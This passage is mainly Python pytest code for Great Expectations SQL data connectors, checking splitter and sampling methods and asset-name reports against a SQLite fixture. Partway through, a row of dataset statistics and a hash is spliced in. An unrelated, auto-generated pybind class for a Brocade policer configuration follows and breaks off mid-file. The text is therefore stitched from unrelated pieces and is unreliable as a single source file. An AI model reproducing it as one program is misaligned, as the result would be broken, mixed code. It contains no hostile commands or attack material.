],
}
},
"unmatched_data_reference_count": 0,
"example_unmatched_data_references": [],
# FIXME: (Sam) example_data_reference removed temporarily in PR #2590:
# "example_data_reference": {
# "n_rows": 8,
# "batch_spec": {
# "table_name": "table_partitioned_by_timestamp_column__B",
# "data_asset_name": "table_partitioned_by_timestamp_column__B",
# "batch_identifiers": {"timestamp": "2020-01-02"},
# "splitter_method": "_split_on_converted_datetime",
# "splitter_kwargs": {"column_name": "timestamp"},
# },
# },
}
def test_example_C(test_cases_for_sql_data_connector_sqlite_execution_engine):
random.seed(0)
db = test_cases_for_sql_data_connector_sqlite_execution_engine
config = yaml.load(
"""
name: my_sql_data_connector
datasource_name: FAKE_Datasource_NAME
assets:
table_partitioned_by_regularly_spaced_incrementing_id_column__C:
splitter_method: _split_on_divided_integer
splitter_kwargs:
column_name: id
divisor: 10
""",
)
config["execution_engine"] = db
my_data_connector = ConfiguredAssetSqlDataConnector(**config)
report = my_data_connector.self_check()
print(json.dumps(report, indent=2))
assert report == {
"class_name": "ConfiguredAssetSqlDataConnector",
"data_asset_count": 1,
"example_data_asset_names": [
"table_partitioned_by_regularly_spaced_incrementing_id_column__C"
],
"data_assets": {
"table_partitioned_by_regularly_spaced_incrementing_id_column__C": {
"batch_definition_count": 12,
"example_data_references": [
{"id": 0},
{"id": 1},
{"id": 2},
],
}
},
"unmatched_data_reference_count": 0,
"example_unmatched_data_references": [],
# FIXME: (Sam) example_data_reference removed temporarily in PR #2590:
# "example_data_reference": {
# "n_rows": 10,
# "batch_spec": {
# "table_name": "table_partitioned_by_regularly_spaced_incrementing_id_column__C",
# "data_asset_name": "table_partitioned_by_regularly_spaced_incrementing_id_column__C",
# "batch_identifiers": {"id": 1},
# "splitter_method": "_split_on_divided_integer",
# "splitter_kwargs": {"column_name": "id", "divisor": 10},
# },
# },
}
def test_example_E(test_cases_for_sql_data_connector_sqlite_execution_engine):
random.seed(0)
db = test_cases_for_sql_data_connector_sqlite_execution_engine
config = yaml.load(
"""
name: my_sql_data_connector
datasource_name: FAKE_Datasource_NAME
assets:
table_partitioned_by_incrementing_batch_id__E:
splitter_method: _split_on_column_value
splitter_kwargs:
column_name: batch_id
""",
)
config["execution_engine"] = db
my_data_connector = ConfiguredAssetSqlDataConnector(**config)
report = my_data_connector.self_check()
print(json.dumps(report, indent=2))
assert report == {
"class_name": "ConfiguredAssetSqlDataConnector",
"data_asset_count": 1,
"example_data_asset_names": ["table_partitioned_by_incrementing_batch_id__E"],
"data_assets": {
"table_partitioned_by_incrementing_batch_id__E": {
"batch_definition_count": 11,
"example_data_references": [
{"batch_id": 0},
{"batch_id": 1},
{"batch_id": 2},
],
}
},
"unmatched_data_reference_count": 0,
"example_unmatched_data_references": [],
# FIXME: (Sam) example_data_reference removed temporarily in PR #2590:
# "example_data_reference": {
# "n_rows": 9,
# "batch_spec": {
# "table_name": "table_partitioned_by_incrementing_batch_id__E",
# "data_asset_name": "table_partitioned_by_incrementing_batch_id__E",
# "batch_identifiers": {"batch_id": 1},
# "splitter_method": "_split_on_column_value",
# "splitter_kwargs": {"column_name": "batch_id"},
# },
# },
}
def test_example_F(test_cases_for_sql_data_connector_sqlite_execution_engine):
random.seed(0)
db = test_cases_for_sql_data_connector_sqlite_execution_engine
config = yaml.load(
"""
name: my_sql_data_connector
datasource_name: FAKE_Datasource_NAME
assets:
table_partitioned_by_foreign_key__F:
splitter_method: _split_on_column_value
splitter_kwargs:
column_name: session_id
""",
)
config["execution_engine"] = db
my_data_connector = ConfiguredAssetSqlDataConnector(**config)
report = my_data_connector.self_check()
print(json.dumps(report, indent=2))
assert report == {
"class_name": "ConfiguredAssetSqlDataConnector",
"data_asset_count": 1,
"example_data_asset_names": ["table_partitioned_by_foreign_key__F"],
"data_assets": {
"table_partitioned_by_foreign_key__F": {
"batch_definition_count": 49,
# TODO Abe 20201029 : These values should be sorted
"example_data_references": [
{"session_id": 2},
{"session_id": 3},
{"session_id": 4},
],
}
},
"unmatched_data_reference_count": 0,
"example_unmatched_data_references": [],
# FIXME: (Sam) example_data_reference removed temporarily in PR #2590:
# "example_data_reference": {
# "n_rows": 2,
# "batch_spec": {
# "table_name": "table_partitioned_by_foreign_key__F",
# "data_asset_name": "table_partitioned_by_foreign_key__F",
# "batch_identifiers": {"session_id": 2},
# "splitter_method": "_split_on_column_value",
# "splitter_kwargs": {"column_name": "session_id"},
# },
# },
}
def test_example_G(test_cases_for_sql_data_connector_sqlite_execution_engine):
random.seed(0)
db = test_cases_for_sql_data_connector_sqlite_execution_engine
config = yaml.load(
"""
name: my_sql_data_connector
datasource_name: FAKE_Datasource_NAME
assets:
table_partitioned_by_multiple_columns__G:
splitter_method: _split_on_multi_column_values
splitter_kwargs:
column_names:
- y
- m
- d
""",
)
config["execution_engine"] = db
my_data_connector = ConfiguredAssetSqlDataConnector(**config)
report = my_data_connector.self_check()
print(json.dumps(report, indent=2))
assert report == {
"class_name": "ConfiguredAssetSqlDataConnector",
"data_asset_count": 1,
"example_data_asset_names": ["table_partitioned_by_multiple_columns__G"],
"data_assets": {
"table_partitioned_by_multiple_columns__G": {
"batch_definition_count": 30,
# TODO Abe 20201029 : These values should be sorted
"example_data_references": [
{"y": 2020, "m": 1, "d": 1},
{"y": 2020, "m": 1, "d": 2},
{"y": 2020, "m": 1, "d": 3},
],
}
},
"unmatched_data_reference_count": 0,
"example_unmatched_data_references": [],
# FIXME: (Sam) example_data_reference removed temporarily in PR #2590:
# "example_data_reference": {
# "n_rows": 8,
# "batch_spec": {
# "table_name": "table_partitioned_by_multiple_columns__G",
# "data_asset_name": "table_partitioned_by_multiple_columns__G",
# "batch_identifiers": {
# "y": 2020,
# "m": 1,
# "d": 2,
# },
# "splitter_method": "_split_on_multi_column_values",
# "splitter_kwargs": {"column_names": ["y", "m", "d"]},
# },
# },
}
def test_example_H(test_cases_for_sql_data_connector_sqlite_execution_engine):
return
# Leaving this test commented for now, since sqlite doesn't support MD5.
# Later, we'll want to add a more thorough test harness, including other databases.
# db = test_cases_for_sql_data_connector_sqlite_execution_engine
# config = yaml.load("""
# name: my_sql_data_connector
# datasource_name: FAKE_Datasource_NAME
# assets:
# table_that_should_be_partitioned_by_random_hash__H:
# splitter_method: _split_on_hashed_column
# splitter_kwargs:
# column_name: id
# hash_digits: 1
# """)
# config["execution_engine"] = db
# my_data_connector = ConfiguredAssetSqlDataConnector(**config)
# report = my_data_connector.self_check()
# print(json.dumps(report, indent=2))
# # TODO: Flesh this out once the implementation actually works to this point
# assert report == {
# "class_name": "ConfiguredAssetSqlDataConnector",
# "data_asset_count": 1,
# "example_data_asset_names": [
# "table_that_should_be_partitioned_by_random_hash__H"
# ],
# "data_assets": {
# "table_that_should_be_partitioned_by_random_hash__H": {
# "batch_definition_count": 16,
# "example_data_references": [
# 0,
# 1,
# 2,
# ]
# }
# },
# "unmatched_data_reference_count": 0,
# "example_unmatched_data_references": []
# }
# ['table_partitioned_by_irregularly_spaced_incrementing_id_with_spacing_in_a_second_table__D',
# 'table_containing_id_spacers_for_D',
# 'table_that_should_be_partitioned_by_random_hash__H']
def test_sampling_method__limit(
test_cases_for_sql_data_connector_sqlite_execution_engine,
):
execution_engine = test_cases_for_sql_data_connector_sqlite_execution_engine
batch_data, batch_markers = execution_engine.get_batch_data_and_markers(
batch_spec=SqlAlchemyDatasourceBatchSpec(
{
"table_name": "table_partitioned_by_date_column__A",
"batch_identifiers": {},
"splitter_method": "_split_on_whole_table",
"splitter_kwargs": {},
"sampling_method": "_sample_using_limit",
"sampling_kwargs": {"n": 20},
}
)
)
batch = Batch(data=batch_data)
validator = Validator(execution_engine, batches=[batch])
assert len(validator.head(fetch_all=True)) == 20
assert not validator.expect_column_values_to_be_in_set(
"date", value_set=["2020-01-02"]
).success
def test_sampling_method__random(
test_cases_for_sql_data_connector_sqlite_execution_engine,
):
execution_engine = test_cases_for_sql_data_connector_sqlite_execution_engine
# noinspection PyUnusedLocal
batch_data, batch_markers = execution_engine.get_batch_data_and_markers(
batch_spec=SqlAlchemyDatasourceBatchSpec(
{
"table_name": "table_partitioned_by_date_column__A",
"batch_identifiers": {},
"splitter_method": "_split_on_whole_table",
"splitter_kwargs": {},
"sampling_method": "_sample_using_random",
"sampling_kwargs": {"p": 1.0},
}
)
)
# random.seed() is no good here: the random number generator is in the database, not python
# assert len(batch_data.head(fetch_all=True)) == 63
pass
def test_sampling_method__mod(
test_cases_for_sql_data_connector_sqlite_execution_engine,
):
execution_engine = test_cases_for_sql_data_connector_sqlite_execution_engine
batch_data, batch_markers = execution_engine.get_batch_data_and_markers(
batch_spec=SqlAlchemyDatasourceBatchSpec(
{
"table_name": "table_partitioned_by_date_column__A",
"batch_identifiers": {},
"splitter_method": "_split_on_whole_table",
"splitter_kwargs": {},
"sampling_method": "_sample_using_mod",
"sampling_kwargs": {
"column_name": "id",
"mod": 10,
"value": 8,
},
}
)
)
execution_engine.load_batch_data("__", batch_data)
validator = Validator(execution_engine)
assert len(validator.head(fetch_all=True)) == 12
def test_sampling_method__a_list(
test_cases_for_sql_data_connector_sqlite_execution_engine,
):
execution_engine = test_cases_for_sql_data_connector_sqlite_execution_engine
batch_data, batch_markers = execution_engine.get_batch_data_and_markers(
batch_spec=SqlAlchemyDatasourceBatchSpec(
{
"table_name": "table_partitioned_by_date_column__A",
"batch_identifiers": {},
"splitter_method": "_split_on_whole_table",
"splitter_kwargs": {},
"sampling_method": "_sample_using_a_list",
"sampling_kwargs": {
"column_name": "id",
"value_list": [10, 20, 30, 40],
},
}
)
)
execution_engine.load_batch_data("__", batch_data)
validator = Validator(execution_engine)
assert len(validator.head(fetch_all=True)) == 4
def test_sampling_method__md5(
test_cases_for_sql_data_connector_sqlite_execution_engine,
):
# noinspection PyUnusedLocal
execution_engine = test_cases_for_sql_data_connector_sqlite_execution_engine
# SQlite doesn't support MD5
# batch_data, batch_markers = execution_engine.get_batch_data_and_markers(
# batch_spec=SqlAlchemyDatasourceBatchSpec({
# "table_name": "table_partitioned_by_date_column__A",
# "batch_identifiers": {},
# "splitter_method": "_split_on_whole_table",
# "splitter_kwargs": {},
# "sampling_method": "_sample_using_md5",
# "sampling_kwargs": {
# "column_name": "index",
# }
# })
# )
def test_to_make_sure_splitter_and_sampler_methods_are_optional(
test_cases_for_sql_data_connector_sqlite_execution_engine,
):
execution_engine = test_cases_for_sql_data_connector_sqlite_execution_engine
batch_data, batch_markers = execution_engine.get_batch_data_and_markers(
batch_spec=SqlAlchemyDatasourceBatchSpec(
{
"table_name": "table_partitioned_by_date_column__A",
"batch_identifiers": {},
"sampling_method": "_sample_using_mod",
"sampling_kwargs": {
"column_name": "id",
"mod": 10,
"value": 8,
},
}
)
)
execution_engine.load_batch_data("__", batch_data)
validator = Validator(execution_engine)
assert len(validator.head(fetch_all=True)) == 12
batch_data, batch_markers = execution_engine.get_batch_data_and_markers(
batch_spec=SqlAlchemyDatasourceBatchSpec(
{
"table_name": "table_partitioned_by_date_column__A",
"batch_identifiers": {},
}
)
)
execution_engine.load_batch_data("__", batch_data)
validator = Validator(execution_engine)
assert len(validator.head(fetch_all=True)) == 120
batch_data, batch_markers = execution_engine.get_batch_data_and_markers(
batch_spec=SqlAlchemyDatasourceBatchSpec(
{
"table_name": "table_partitioned_by_date_column__A",
"batch_identifiers": {},
"splitter_method": "_split_on_whole_table",
"splitter_kwargs": {},
}
)
)
execution_engine.load_batch_data("__", batch_data)
validator = Validator(execution_engine)
assert len(validator.head(fetch_all=True)) == 120
def test_default_behavior_with_no_splitter(
test_cases_for_sql_data_connector_sqlite_execution_engine,
):
db = test_cases_for_sql_data_connector_sqlite_execution_engine
config = yaml.load(
"""
name: my_sql_data_connector
datasource_name: FAKE_Datasource_NAME
assets:
table_partitioned_by_date_column__A: {}
""",
)
config["execution_engine"] = db
my_data_connector = ConfiguredAssetSqlDataConnector(**config)
report_object = my_data_connector.self_check()
print(json.dumps(report_object, indent=2))
batch_definition_list = (
my_data_connector.get_batch_definition_list_from_batch_request(
batch_request=BatchRequest(
datasource_name="FAKE_Datasource_NAME",
data_connector_name="my_sql_data_connector",
data_asset_name="table_partitioned_by_date_column__A",
)
)
)
assert len(batch_definition_list) == 1
assert batch_definition_list[0]["batch_identifiers"] == {}
batch_definition_list = (
my_data_connector.get_batch_definition_list_from_batch_request(
batch_request=BatchRequest(
datasource_name="FAKE_Datasource_NAME",
data_connector_name="my_sql_data_connector",
data_asset_name="table_partitioned_by_date_column__A",
data_connector_query={},
)
)
)
assert len(batch_definition_list) == 1
assert batch_definition_list[0]["batch_identifiers"] == {}
batch_definition_list = (
my_data_connector.get_batch_definition_list_from_batch_request(
batch_request=BatchRequest(
datasource_name="FAKE_Datasource_NAME",
data_connector_name="my_sql_data_connector",
data_asset_name="table_partitioned_by_date_column__A",
data_connector_query={"batch_filter_parameters": {}},
)
)
)
assert len(batch_definition_list) == 1
assert batch_definition_list[0]["batch_identifiers"] == {}
def test_behavior_with_whole_table_splitter(
test_cases_for_sql_data_connector_sqlite_execution_engine,
):
db = test_cases_for_sql_data_connector_sqlite_execution_engine
config = yaml.load(
"""
name: my_sql_data_connector
datasource_name: FAKE_Datasource_NAME
assets:
table_partitioned_by_date_column__A:
splitter_method : "_split_on_whole_table"
splitter_kwargs : {}
""",
)
config["execution_engine"] = db
my_data_connector = ConfiguredAssetSqlDataConnector(**config)
report_object = my_data_connector.self_check()
print(json.dumps(report_object, indent=2))
batch_definition_list = (
my_data_connector.get_batch_definition_list_from_batch_request(
batch_request=BatchRequest(
datasource_name="FAKE_Datasource_NAME",
data_connector_name="my_sql_data_connector",
data_asset_name="table_partitioned_by_date_column__A",
)
)
)
assert len(batch_definition_list) == 1
assert batch_definition_list[0]["batch_identifiers"] == {}
batch_definition_list = (
my_data_connector.get_batch_definition_list_from_batch_request(
batch_request=BatchRequest(
datasource_name="FAKE_Datasource_NAME",
data_connector_name="my_sql_data_connector",
data_asset_name="table_partitioned_by_date_column__A",
data_connector_query={},
)
)
)
assert len(batch_definition_list) == 1
assert batch_definition_list[0]["batch_identifiers"] == {}
batch_definition_list = (
my_data_connector.get_batch_definition_list_from_batch_request(
batch_request=BatchRequest(
datasource_name="FAKE_Datasource_NAME",
data_connector_name="my_sql_data_connector",
data_asset_name="table_partitioned_by_date_column__A",
data_connector_query={"batch_filter_parameters": {}},
)
)
)
assert len(batch_definition_list) == 1
assert batch_definition_list[0]["batch_identifiers"] == {}
def test_basic_instantiation_of_InferredAssetSqlDataConnector(
test_cases_for_sql_data_connector_sqlite_execution_engine,
):
my_data_connector = instantiate_class_from_config(
config={
"class_name": "InferredAssetSqlDataConnector",
"name": "whole_table",
"data_asset_name_prefix": "prexif__",
"data_asset_name_suffix": "__xiffus",
},
runtime_environment={
"execution_engine": test_cases_for_sql_data_connector_sqlite_execution_engine,
"datasource_name": "my_test_datasource",
},
config_defaults={"module_name": "great_expectations.datasource.data_connector"},
)
report_object = my_data_connector.self_check()
# print(json.dumps(report_object, indent=4))
assert report_object == {
"class_name": "InferredAssetSqlDataConnector",
"data_asset_count": 21,
"example_data_asset_names": [
"prexif__table_containing_id_spacers_for_D__xiffus",
"prexif__table_full__I__xiffus",
"prexif__table_partitioned_by_date_column__A__xiffus",
],
"data_assets": {
"prexif__table_containing_id_spacers_for_D__xiffus": {
"batch_definition_count": 1,
"example_data_references": [{}],
},
"prexif__table_full__I__xiffus": {
"batch_definition_count": 1,
"example_data_references": [{}],
},
"prexif__table_partitioned_by_date_column__A__xiffus": {
"batch_definition_count": 1,
"example_data_references": [{}],
},
},
"unmatched_data_reference_count": 0,
"example_unmatched_data_references": [],
# FIXME: (Sam) example_data_reference removed temporarily in PR #2590:
# "example_data_reference": {
# "batch_spec": {
# "schema_name": "main",
# "table_name": "table_containing_id_spacers_for_D",
# "data_asset_name": "prexif__table_containing_id_spacers_for_D__xiffus",
# "batch_identifiers": {},
# },
# "n_rows": 30,
# },
}
assert my_data_connector.get_available_data_asset_names() == [
"prexif__table_containing_id_spacers_for_D__xiffus",
"prexif__table_full__I__xiffus",
"prexif__table_partitioned_by_date_column__A__xiffus",
"prexif__table_partitioned_by_foreign_key__F__xiffus",
"prexif__table_partitioned_by_incrementing_batch_id__E__xiffus",
"prexif__table_partitioned_by_irregularly_spaced_incrementing_id_with_spacing_in_a_second_table__D__xiffus",
"prexif__table_partitioned_by_multiple_columns__G__xiffus",
"prexif__table_partitioned_by_regularly_spaced_incrementing_id_column__C__xiffus",
"prexif__table_partitioned_by_timestamp_column__B__xiffus",
"prexif__table_that_should_be_partitioned_by_random_hash__H__xiffus",
"prexif__table_with_fk_reference_from_F__xiffus",
"prexif__view_by_date_column__A__xiffus",
"prexif__view_by_incrementing_batch_id__E__xiffus",
"prexif__view_by_irregularly_spaced_incrementing_id_with_spacing_in_a_second_table__D__xiffus",
"prexif__view_by_multiple_columns__G__xiffus",
"prexif__view_by_regularly_spaced_incrementing_id_column__C__xiffus",
"prexif__view_by_timestamp_column__B__xiffus",
"prexif__view_containing_id_spacers_for_D__xiffus",
"prexif__view_partitioned_by_foreign_key__F__xiffus",
"prexif__view_that_should_be_partitioned_by_random_hash__H__xiffus",
"prexif__view_with_fk_reference_from_F__xiffus",
]
batch_definition_list = my_data_connector.get_batch_definition_list_from_batch_request(
BatchRequest(
datasource_name="my_test_datasource",
data_connector_name="whole_table",
data_asset_name="prexif__table_that_should_be_partitioned_by_random_hash__H__xiffus",
)
)
assert len(batch_definition_list) == 1
def test_more_complex_instantiation_of_InferredAssetSqlDataConnector(
test_cases_for_sql_data_connector_sqlite_execution_engine,
):
my_data_connector = instantiate_class_from_config(
config={
"class_name": "InferredAssetSqlDataConnector",
"name": "whole_table",
"data_asset_name_suffix": "__whole",
"include_schema_name": True,
},
runtime_environment={
"execution_engine": test_cases_for_sql_data_connector_sqlite_execution_engine,
"datasource_name": "my_test_datasource",
},
config_defaults={"module_name": "great_expectations.datasource.data_connector"},
)
report_object = my_data_connector.self_check()
assert report_object == {
"class_name": "InferredAssetSqlDataConnector",
"data_asset_count": 21,
"data_assets": {
"main.table_containing_id_spacers_for_D__whole": {
"batch_definition_count": 1,
"example_data_references": [{}],
},
"main.table_full__I__whole": {
"batch_definition_count": 1,
"example_data_references": [{}],
},
"main.table_partitioned_by_date_column__A__whole": {
"batch_definition_count": 1,
"example_data_references": [{}],
},
},
"example_data_asset_names": [
"main.table_containing_id_spacers_for_D__whole",
"main.table_full__I__whole",
"main.table_partitioned_by_date_column__A__whole",
],
# FIXME: (Sam) example_data_reference removed temporarily in PR #2590:
# "example_data_reference": {
# "batch_spec": {
# "batch_identifiers": {},
# "schema_name": "main",
# "table_name": "table_containing_id_spacers_for_D",
# "data_asset_name": "main.table_containing_id_spacers_for_D__whole",
# },
# "n_rows": 30,
# },
"example_unmatched_data_references": [],
"unmatched_data_reference_count": 0,
}
assert my_data_connector.get_available_data_asset_names() == [
"main.table_containing_id_spacers_for_D__whole",
"main.table_full__I__whole",
"main.table_partitioned_by_date_column__A__whole",
"main.table_partitioned_by_foreign_key__F__whole",
"main.table_partitioned_by_incrementing_batch_id__E__whole",
"main.table_partitioned_by_irregularly_spaced_incrementing_id_with_spacing_in_a_second_table__D__whole",
"main.table_partitioned_by_multiple_columns__G__whole",
"main.table_partitioned_by_regularly_spaced_incrementing_id_column__C__whole",
"main.table_partitioned_by_timestamp_column__B__whole",
"main.table_that_should_be_partitioned_by_random_hash__H__whole",
"main.table_with_fk_reference_from_F__whole",
"main.view_by_date_column__A__whole",
"main.view_by_incrementing_batch_id__E__whole",
"main.view_by_irregularly_spaced_incrementing_id_with_spacing_in_a_second_table__D__whole",
"main.view_by_multiple_columns__G__whole",
"main.view_by_regularly_spaced_incrementing_id_column__C__whole",
"main.view_by_timestamp_column__B__whole",
"main.view_containing_id_spacers_for_D__whole",
"main.view_partitioned_by_foreign_key__F__whole",
"main.view_that_should_be_partitioned_by_random_hash__H__whole",
"main.view_with_fk_reference_from_F__whole",
]
batch_definition_list = my_data_connector.get_batch_definition_list_from_batch_request(
BatchRequest(
datasource_name="my_test_datasource",
data_connector_name="whole_table",
data_asset_name="main.table_that_should_be_partitioned_by_random_hash__H__whole",
)
)
assert len(batch_definition_list) == 1
def test_basic_instantiation_of_ConfiguredAssetSqlDataConnector(
test_cases_for_sql_data_connector_sqlite_execution_engine,
):
my_data_connector = instantiate_class_from_config(
config={
"class_name": "ConfiguredAssetSqlDataConnector",
"name": "my_sql_data_connector",
"assets": {"main.table_full__I__whole": {}},
},
runtime_environment={
"execution_engine": test_cases_for_sql_data_connector_sqlite_execution_engine,
"datasource_name": "my_test_datasource",
},
config_defaults={"module_name": "great_expectations.datasource.data_connector"},
)
report_object = my_data_connector.self_check()
assert report_object == {
"class_name": "ConfiguredAssetSqlDataConnector",
"data_asset_count": 1,
"example_data_asset_names": ["main.table_full__I__whole"],
"data_assets": {
"main.table_full__I__whole": {
"batch_definition_count": 1,
"example_data_references": [{}],
}
},
"unmatched_data_reference_count": 0,
"example_unmatched_data_references": [],
}
def test_more_complex_instantiation_of_ConfiguredAssetSqlDataConnector(
test_cases_for_sql_data_connector_sqlite_execution_engine,
):
my_data_connector = instantiate_class_from_config(
config={
"class_name": "ConfiguredAssetSqlDataConnector",
"name": "my_sql_data_connector",
"assets": {
"main.table_partitioned_by_date_column__A": {
"splitter_method": "_split_on_column_value",
"splitter_kwargs": {"column_name": "date"},
},
},
},
runtime_environment={
"execution_engine": test_cases_for_sql_data_connector_sqlite_execution_engine,
"datasource_name": "my_test_datasource",
},
config_defaults={"module_name": "great_expectations.datasource.data_connector"},
)
report_object = my_data_connector.self_check()
assert report_object == {
"class_name": "ConfiguredAssetSqlDataConnector",
"data_asset_count": 1,
"example_data_asset_names": ["main.table_partitioned_by_date_column__A"],
"data_assets": {
"main.table_partitioned_by_date_column__A": {
"batch_definition_count": 30,
"example_data_references": [
{"date": "2020-01-01"},
{"date": "2020-01-02"},
{"date": "2020-01-03"},
],
}
},
"unmatched_data_reference_count": 0,
"example_unmatched_data_references": [],
}
def test_more_complex_instantiation_of_ConfiguredAssetSqlDataConnector_include_schema_name(
test_cases_for_sql_data_connector_sqlite_execution_engine,
):
my_data_connector: ConfiguredAssetSqlDataConnector = ConfiguredAssetSqlDataConnector(
name="my_sql_data_connector",
datasource_name="my_test_datasource",
execution_engine="test_cases_for_sql_data_connector_sqlite_execution_engine",
assets={
"table_partitioned_by_date_column__A": {
"splitter_method": "_split_on_column_value",
"splitter_kwargs": {"column_name": "date"},
"include_schema_name": True,
"schema_name": "main",
},
},
)
assert "main.table_partitioned_by_date_column__A" in my_data_connector.assets
# schema_name given but include_schema_name is set to False
with pytest.raises(ge_exceptions.DataConnectorError) as e:
ConfiguredAssetSqlDataConnector(
name="my_sql_data_connector",
datasource_name="my_test_datasource",
execution_engine="test_cases_for_sql_data_connector_sqlite_execution_engine",
assets={
"table_partitioned_by_date_column__A": {
"splitter_method": "_split_on_column_value",
"splitter_kwargs": {"column_name": "date"},
"include_schema_name": False,
"schema_name": "main",
},
},
)
assert (
e.value.message
== "ConfiguredAssetSqlDataConnector ran into an error while initializing Asset names. Schema main was specified, but 'include_schema_name' flag was set to False."
)
def test_more_complex_instantiation_of_ConfiguredAssetSqlDataConnector_include_schema_name_prefix_suffix(
test_cases_for_sql_data_connector_sqlite_execution_engine,
):
my_data_connector: ConfiguredAssetSqlDataConnector = ConfiguredAssetSqlDataConnector(
name="my_sql_data_connector",
datasource_name="my_test_datasource",
execution_engine="test_cases_for_sql_data_connector_sqlite_execution_engine",
assets={
"table_partitioned_by_date_column__A": {
"splitter_method": "_split_on_column_value",
"splitter_kwargs": {"column_name": "date"},
"include_schema_name": True,
"schema_name": "main",
"data_asset_name_prefix": "taxi__",
"data_asset_name_suffix": "__asset",
},
},
)
assert (
"taxi__main.table_partitioned_by_date_column__A__asset"
in my_data_connector.assets
)
# schema_name provided, but include_schema_name is set to False
with pytest.raises(ge_exceptions.DataConnectorError) as e:
ConfiguredAssetSqlDataConnector(
name="my_sql_data_connector",
datasource_name="my_test_datasource",
execution_engine="test_cases_for_sql_data_connector_sqlite_execution_engine",
assets={
"table_partitioned_by_date_column__A": {
"splitter_method": "_split_on_column_value",
"splitter_kwargs": {"column_name": "date"},
"include_schema_name": False,
"schema_name": "main",
"data_asset_name_prefix": "taxi__",
"data_asset_name_suffix": "__asset",
},
},
)
assert (
e.value.message
== "ConfiguredAssetSqlDataConnector ran into an error while initializing Asset names. Schema main was specified, but 'include_schema_name' flag was set to False."
)
# TODO
def test_ConfiguredAssetSqlDataConnector_with_sorting(
test_cases_for_sql_data_connector_sqlite_execution_engine,
):
pass
| 37.550083 | 170 | 0.641214 | 4,699 | 44,985 | 5.515429 | 0.064907 | 0.076745 | 0.05834 | 0.02836 | 0.909519 | 0.89941 | 0.874484 | 0.830883 | 0.80781 | 0.786434 | 0 | 0.011755 | 0.270068 | 44,985 | 1,197 | 171 | 37.581454 | 0.777531 | 0.162565 | 0 | 0.625954 | 0 | 0.002545 | 0.311302 | 0.226679 | 0 | 0 | 0 | 0.007519 | 0.052163 | 1 | 0.030534 | false | 0.002545 | 0.015267 | 0.001272 | 0.047074 | 0.01145 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
5814c2c73684f8c12a9b10170fc0730fc72e1c01 | 42,982 | py | Python | pybind/nos/v7_1_0/policy_map/class_/police/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | null | null | null | pybind/nos/v7_1_0/policy_map/class_/police/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | null | null | null | pybind/nos/v7_1_0/policy_map/class_/police/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | 1 | 2021-11-05T22:15:42.000Z | 2021-11-05T22:15:42.000Z |
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
class police(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-policer - based on the path /policy-map/class/police. Each member element of
the container is represented as a class variable - with a specific
YANG type.
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__cir','__cbs','__eir','__ebs','__set_priority','__conform_set_dscp','__conform_set_prec','__conform_set_tc','__exceed_set_dscp','__exceed_set_prec','__exceed_set_tc',)
_yang_name = 'police'
_rest_name = 'police'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__exceed_set_tc = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 7']}), is_leaf=True, yang_name="exceed-set-tc", rest_name="exceed-set-tc", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Traffic Class value for exceeded traffic.'}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='tc-value', is_config=True)
self.__eir = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), restriction_dict={'range': [u'0..100000000000']}), is_leaf=True, yang_name="eir", rest_name="eir", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Exceeded Information Rate.', u'cli-optional-in-sequence': None}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='uint64', is_config=True)
self.__cbs = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), restriction_dict={'range': [u'1250..12500000000']}), is_leaf=True, yang_name="cbs", rest_name="cbs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Comitted Burst Size.', u'cli-optional-in-sequence': None}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='uint64', is_config=True)
